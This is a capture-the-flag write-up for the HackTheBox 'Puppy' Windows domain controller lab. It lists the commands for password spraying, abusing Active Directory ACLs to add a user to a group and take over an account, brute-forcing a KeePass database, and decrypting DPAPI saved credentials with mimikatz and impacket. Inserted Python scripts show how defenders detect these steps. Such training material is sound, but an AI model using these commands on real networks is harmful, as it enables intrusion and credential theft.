HTB | Puppy
This is a Windows box. You can find it here
IP - 10.10.11.70
MACHINE INFORMATION - As is common in real life pentests, you will start the Puppy box with credentials for the following account: levi.james / KingofAkron2025!
Nmap
└─$ nmap -sT -p- --min-rate 10000 10.10.11.70 -Pn -oA nmap_ports                                                                                      
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-05-18 11:40 IST
Nmap scan report for 10.10.11.70
Host is up (0.25s latency).
Not shown: 65513 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
111/tcp   open  rpcbind
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
2049/tcp  open  nfs
3260/tcp  open  iscsi
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49664/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
55152/tcp open  unknown
55178/tcp open  unknown
55214/tcp open  unknown
Nmap done: 1 IP address (1 host up) scanned in 38.32 seconds
└─$ nmap -sC -sV -p 53,88,111,135,139,389,445,464,593,636,2049,3260,3268,3269,5985,9389,49664,49669,49670,55152,55178,55214 10.10.11.70 -Pn -oA nmap_ports_details
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-05-18 11:45 IST
Nmap scan report for 10.10.11.70
Host is up (0.26s latency).
Bug in iscsi-info: no string output.
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-05-18 13:16:03Z)
111/tcp   open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
2049/tcp  open  nlockmgr      1-4 (RPC #100021)
3260/tcp  open  iscsi?
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
55152/tcp open  msrpc         Microsoft Windows RPC
55178/tcp open  msrpc         Microsoft Windows RPC
55214/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time: 
|   date: 2025-05-18T13:17:57
|_  start_date: N/A
|_clock-skew: 7h00m03s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 312.85 seconds
LDAP
└─$ ldapsearch -H ldap://10.10.11.70 -x -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts 
#
#
dn:
namingcontexts: DC=PUPPY,DC=HTB
namingcontexts: CN=Configuration,DC=PUPPY,DC=HTB
namingcontexts: CN=Schema,CN=Configuration,DC=PUPPY,DC=HTB
namingcontexts: DC=DomainDnsZones,DC=PUPPY,DC=HTB
namingcontexts: DC=ForestDnsZones,DC=PUPPY,DC=HTB
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
From the above, we can confirm the domain name puppy.htb.
Since we have credentials, we can run an authenticated LDAP query to get all the user info
ldapsearch -H ldap://10.10.11.70 -x -b "DC=PUPPY,DC=HTB" -D "levi.james@puppy.htb" -w 'KingofAkron2025!' "(objectClass=user)"
Now we can copy the list of users
ldapsearch -H ldap://10.10.11.70 -x -b "DC=PUPPY,DC=HTB" -D "levi.james@puppy.htb" -w 'KingofAkron2025!' "(objectClass=user)" sAMAccountName
└─$ cat users.txt
levi.james
ant.edwards
adam.silver
jamie.williams
steph.cooper
steph.cooper_adm
Let’s use netexec to see if anyone is using Levi’s password
└─$ netexec smb 10.10.11.70 -u users.txt -p 'KingofAkron2025!' --continue-on-success
SMB         10.10.11.70     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB         10.10.11.70     445    DC               [+] PUPPY.HTB\levi.james:KingofAkron2025! 
SMB         10.10.11.70     445    DC               [-] PUPPY.HTB\ant.edwards:KingofAkron2025! STATUS_LOGON_FAILURE 
SMB         10.10.11.70     445    DC               [-] PUPPY.HTB\adam.silver:KingofAkron2025! STATUS_LOGON_FAILURE 
SMB         10.10.11.70     445    DC               [-] PUPPY.HTB\jamie.williams:KingofAkron2025! STATUS_LOGON_FAILURE 
SMB         10.10.11.70     445    DC               [-] PUPPY.HTB\steph.cooper:KingofAkron2025! STATUS_LOGON_FAILURE 
SMB         10.10.11.70     445    DC               [-] PUPPY.HTB\steph.cooper_adm:KingofAkron2025! STATUS_LOGON_FAILURE 
So no one is using Levi’s password
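The netexec run above leaves one logon event per tried account on the DC, which is exactly what a defender alerts on. The following is an added example (not from the writeup) of that detection over constructed events; the CSV field layout and the source addresses are assumptions.

```python
"""Password-spray detection over constructed DC logon events (added example,
not from the writeup). A spray like the netexec run above leaves one logon
event per account on the DC: 4625 per failure, 4624 for the single hit. The
tell is one source touching many distinct accounts in a short window. The CSV
field layout is an assumption, not a real SIEM schema."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: timestamp,event_id,target_user,source_ip,status
SAMPLE_EVENTS = """\
2025-05-18T13:20:01,4624,levi.james,10.10.14.5,0x0
2025-05-18T13:20:01,4625,ant.edwards,10.10.14.5,0xC000006D
2025-05-18T13:20:02,4625,adam.silver,10.10.14.5,0xC000006D
2025-05-18T13:20:02,4625,jamie.williams,10.10.14.5,0xC000006D
2025-05-18T13:20:03,4625,steph.cooper,10.10.14.5,0xC000006D
2025-05-18T13:20:03,4625,steph.cooper_adm,10.10.14.5,0xC000006D
2025-05-18T13:25:00,4625,levi.james,10.10.14.9,0xC000006D
2025-05-18T13:25:30,4625,levi.james,10.10.14.9,0xC000006D
"""

def parse_events(text):
    """Parse the constructed CSV lines into dicts with a datetime timestamp."""
    events = []
    for line in text.splitlines():
        ts, eid, user, src, status = line.split(",")
        events.append({"ts": datetime.fromisoformat(ts), "id": int(eid),
                       "user": user.lower(), "src": src, "status": status})
    return events

def detect_spray(events, window=timedelta(minutes=5), min_users=4):
    """Return {source_ip: sorted distinct accounts} for every source that
    tried at least `min_users` different accounts within `window`. Successful
    logons (4624) count too, so the one account the spray hit is not lost;
    a single user mistyping a password never crosses the threshold."""
    by_src = defaultdict(list)
    for e in events:
        if e["id"] in (4624, 4625):
            by_src[e["src"]].append(e)
    alerts = {}
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["ts"])
        for i, start in enumerate(evs):
            users = {e["user"] for e in evs[i:] if e["ts"] - start["ts"] <= window}
            if len(users) >= min_users:
                alerts[src] = sorted(users)
                break
    return alerts

if __name__ == "__main__":
    for src, users in detect_spray(parse_events(SAMPLE_EVENTS)).items():
        print(f"possible spray from {src}: {len(users)} accounts {users}")
```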
Bloodhound
Since we have credentials for the user, let's use bloodhound-python for further enumeration
└─$ bloodhound-python -u levi.james -p 'KingofAkron2025!' -d puppy.htb -ns 10.10.11.70 -c All
Foothold / shell
Shell as adam.silver
GenericWrite
On analyzing the BloodHound data I can see LEVI.JAMES@PUPPY.HTB → MemberOf → HR@PUPPY.HTB → GenericWrite → DEVELOPERS@PUPPY.HTB. We can exploit this to escalate privileges by adding Levi to the DEVELOPERS@puppy.htb group using the GenericWrite permission.

I have added levi to the Developers group
└─$ net rpc group addmem "Developers" "levi.james"  -U "puppy.htb"/"levi.james"%'KingofAkron2025!' -S 10.10.11.70
Now levi has read access to the DEV share
└─$ netexec smb 10.10.11.70 -u users.txt -p 'KingofAkron2025!' --shares
SMB         10.10.11.70     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB         10.10.11.70     445    DC               [+] PUPPY.HTB\levi.james:KingofAkron2025! 
SMB         10.10.11.70     445    DC               [*] Enumerated shares
SMB         10.10.11.70     445    DC               Share           Permissions     Remark
SMB         10.10.11.70     445    DC               -----           -----------     ------
SMB         10.10.11.70     445    DC               ADMIN$                          Remote Admin
SMB         10.10.11.70     445    DC               C$                              Default share
SMB         10.10.11.70     445    DC               DEV             READ            DEV-SHARE for PUPPY-DEVS
SMB         10.10.11.70     445    DC               IPC$            READ            Remote IPC
SMB         10.10.11.70     445    DC               NETLOGON        READ            Logon server share 
SMB         10.10.11.70     445    DC               SYSVOL          READ            Logon server share keepass DB
Now we can list the directories in DEV
└─$ smbmap -H 10.10.11.70 -u levi.james -p 'KingofAkron2025!' -r 'DEV' --dir-only
└─$ smbclient //10.10.11.70/DEV -U levi.james
We found recovery.kdbx

Let’s download the file
smb: \> mget recovery.kdbx 
└─$ file recovery.kdbx 
recovery.kdbx: Keepass password database 2.x KDBX
Since this version of KeePass is not supported by John the Ripper we will use keepass4brute
└─$ ./keepass4brute.sh ../recovery.kdbx /home/anurag/stuff/rockyou.txt
We have found the password
Let’s use this password to open recovery.kdbx
and we now have the clear text passwords for adam, anthony, jamie, samuel, steve
samuel and steve were not found earlier so I will add them to our user list

We will use kerbrute to check the valid username and password
└─$ ./kerbrute bruteforce --dc 10.10.11.70 -d puppy.htb creds.txt  -v
and we got a hit for ant.edwards

GenericAll
On analyzing the BloodHound data I can see ANT.EDWARDS@PUPPY.HTB → MemberOf → SENIOR DEVS@PUPPY.HTB → GenericAll → ADAM.SILVER@PUPPY.HTB
GenericAll is also known as full control. This privilege allows the trustee to manipulate the target object however they wish.

So we can re-enable the disabled account adam.silver
We will use bloodyAD for this
└─$ bloodyAD --host 10.10.11.70 -u ant.edwards -p '<PASSWORD>' remove uac adam.silver -f ACCOUNTDISABLE
[-] ['ACCOUNTDISABLE'] property flags removed from adam.silver's userAccountControl
Since the adam user was disabled we need to reset the password
└─$ net rpc password "adam.silver" 'P@ssw0rd@123' -U "puppy.htb"/"ant.edwards"%'Antman2025!' -S 10.10.11.70
or
└─$ bloodyAD --host 10.10.11.70 -u ant.edwards -p '<PASSWORD>' set password  adam.silver 'P@ssword!'
[+] Password changed successfully!
Now we can log in
└─$ evil-winrm -i 10.129.244.42 -u adam.silver -p 'P@ssword!'
found user.txt
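Every step of the two ACL abuses above (adding levi to Developers, re-enabling adam.silver, resetting his password) is written to the DC's Security log. As an added example (not from the writeup), this script flags those events when the acting principal is not on an allowlist; the JSON field names, the sample records and the allowlist are assumptions.

```python
"""Flag the directory changes made above from Security-log events (added
example, not from the writeup). The DC logs the steps as 4728 (member added
to a security-enabled global group), 4722 (user account enabled) and 4724
(password reset attempted on another account). The records below are
constructed to mirror the net rpc / bloodyAD commands; the JSON field names
are an assumption, not a particular SIEM schema."""
import json

# Constructed sample, one event per line
SAMPLE_LOG = """\
{"id":4728,"subject":"levi.james","group":"Developers","member":"levi.james"}
{"id":4722,"subject":"ant.edwards","target":"adam.silver"}
{"id":4724,"subject":"ant.edwards","target":"adam.silver"}
{"id":4724,"subject":"Administrator","target":"jamie.williams"}
{"id":4728,"subject":"Administrator","group":"HR","member":"steph.cooper"}
"""

# Assumed allowlist: principals whose account-management actions are expected.
TRUSTED_ADMINS = {"administrator"}

def audit(log_text):
    """Return [(finding, actor, object)] for events raised by non-allowlisted
    actors. A self-add to a group is the GenericWrite abuse; an enable plus a
    password reset by a third party is the GenericAll takeover."""
    findings = []
    for line in log_text.splitlines():
        ev = json.loads(line)
        actor = ev["subject"].lower()
        if actor in TRUSTED_ADMINS:
            continue
        if ev["id"] == 4728:
            kind = "self-add to group" if actor == ev["member"].lower() else "group membership change"
            findings.append((kind, actor, ev["group"]))
        elif ev["id"] == 4722:
            findings.append(("account enabled", actor, ev["target"]))
        elif ev["id"] == 4724:
            findings.append(("password reset of another account", actor, ev["target"]))
    return findings

if __name__ == "__main__":
    for finding, actor, obj in audit(SAMPLE_LOG):
        print(f"{finding:34s} actor={actor} object={obj}")
```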

Privilege Escalation
Shell as Steph.cooper
Backup folder
found Backup folder in C:\

found site-backup-2024-12-30.zip, let’s download it and unzip it

found nms-auth-config.xml.bak in which we found the credentials for steph.cooper

and we are in as steph.cooper

Shell as steph.cooper_adm
Saved credential - DPAPI
We can see Microsoft Edge.lnk on the Desktop

which would indicate usage of Microsoft Edge with a potentially saved password.
The saved credentials are stored as DPAPI-protected blobs here
gci -force AppData\Roaming\Microsoft\Credentials

The master keys for these are stored here
gci -force AppData\Roaming\Microsoft\Protect
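Each blob under Credentials names, in its header, the master key file under Protect\<SID>\ that protects it; that pairing is what both methods below rely on. As an added example (not from the writeup, and no decryption), this parser reads the pairing for IR triage; the layout follows the public CREDENTIAL_FILE / DPAPI_BLOB structure definitions, and the sample files are constructed.

```python
"""Map each DPAPI credential blob to the master key file it needs (added
example, not from the writeup). A file under Credentials\ is a 12-byte
CREDENTIAL_FILE header (version, blob size, reserved) followed by a DPAPI blob
whose header carries the master key GUID; that GUID is the file name under
Protect\<SID>\. Knowing the pairing before any decryption tells IR which key
an attacker needed and which blobs a recovered key exposes. Layout follows
the public DPAPI_BLOB and CredentialFile structures; samples are constructed."""
import struct
import uuid

DPAPI_PROVIDER = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")
BLOB_HDR = "<I16sI16sII"  # version, provider GUID, mk version, mk GUID, flags, desc length

def parse_credential_file(data):
    """Return (master_key_guid, description) for a CREDENTIAL_FILE image."""
    version, size, _reserved = struct.unpack_from("<III", data, 0)
    if version != 1 or size != len(data) - 12:
        raise ValueError("not a CREDENTIAL_FILE image")
    blob = data[12:]
    ver, prov, _mkver, mk_guid, _flags, desc_len = struct.unpack_from(BLOB_HDR, blob, 0)
    if ver != 1 or uuid.UUID(bytes_le=prov) != DPAPI_PROVIDER:
        raise ValueError("not a DPAPI blob")
    off = struct.calcsize(BLOB_HDR)
    desc = blob[off:off + desc_len].decode("utf-16-le").rstrip("\x00")
    return str(uuid.UUID(bytes_le=mk_guid)), desc

def needed_master_keys(files):
    """{master_key_guid: [credential file names]} for a dict name -> bytes."""
    out = {}
    for name, data in files.items():
        guid, _ = parse_credential_file(data)
        out.setdefault(guid, []).append(name)
    return out

def build_sample(master_key_guid, description):
    """Constructed CREDENTIAL_FILE carrying only the header fields read above;
    the cipher-related fields that follow in a real blob are left out."""
    desc = (description + "\x00").encode("utf-16-le")
    blob = struct.pack(BLOB_HDR, 1, DPAPI_PROVIDER.bytes_le, 1,
                       uuid.UUID(master_key_guid).bytes_le, 0, len(desc)) + desc
    return struct.pack("<III", 1, len(blob), 0) + blob

# Constructed input: two blobs protected by the master key GUID used in the writeup.
SAMPLE_FILES = {
    "C8D69EBE9A43E9DEBF6B5FBD48B521B9": build_sample("556a2412-1275-4ccf-b721-e6a0b4f90407", "Local Credential Data"),
    "CONSTRUCTED_SECOND_BLOB": build_sample("556a2412-1275-4ccf-b721-e6a0b4f90407", "Local Credential Data"),
}

if __name__ == "__main__":
    for guid, names in needed_master_keys(SAMPLE_FILES).items():
        print(f"master key {guid} protects: {', '.join(names)}")
```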
Decrypt Credential — Decrypt Master Key
There are two methods
- via mimikatz 
- via impacket-dpapi 
Via Mimikatz
The challenge is that the master key is encrypted with the user’s password, and I don’t have it. Fortunately, there’s a blog post from SpecterOps that shows how to decrypt without the password, using an RPC called MS-BKRP (BackupKey Remote Protocol). To abuse this I’ll use the /rpc flag in Mimikatz.
Let's upload mimikatz to the box

Now we have to get the key
*Evil-WinRM* PS C:\Users\steph.cooper> .\mimikatz.exe "dpapi::masterkey /in:C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107\556a2412-1275-4ccf-b721-e6a0b4f90407 /rpc" exit
We have the key at the end. Now let's try this key on the credential
.\mimikatz.exe "dpapi::cred /in:C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials\C8D69EBE9A43E9DEBF6B5FBD48B521B9 /masterkey:d9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84" exit
Now we have the credentials for steph.cooper_adm
Via impacket-dpapi
We will convert the credential file into base64 so that we can transfer it to our machine (or we can simply download the file since we have evil-winrm)
gci -force AppData\Roaming\Microsoft\Credentials
*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials> [System.Convert]::ToBase64String((Get-Content C8D69EBE9A43E9DEBF6B5FBD48B521B9 -Encoding byte))
Decode it and write it on our machine.
echo "<BASE64 blob>" | base64 -d > C8D69EBE9A43E9DEBF6B5FBD48B521B9
We will transfer the master key in a similar manner
*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107> [System.Convert]::ToBase64String((Get-Content 556a2412-1275-4ccf-b721-e6a0b4f90407 -Encoding byte))
echo "<BASE64 BLOB>" | base64 -d > 556a2412-1275-4ccf-b721-e6a0b4f90407
Now let’s use impacket-dpapi to get the key
└─$ impacket-dpapi masterkey -file 556a2412-1275-4ccf-b721-e6a0b4f90407 -sid S-1-5-21-1487982659-1829050783-2281216199-1107 -password '<STEPH.COOPER PASSWORD>'
Now let’s use this key to get the credential
└─$ impacket-dpapi credential -file C8D69EBE9A43E9DEBF6B5FBD48B521B9 -key <KEY>
Since we have the credentials of steph.cooper_adm we can log in

and we got root.txt
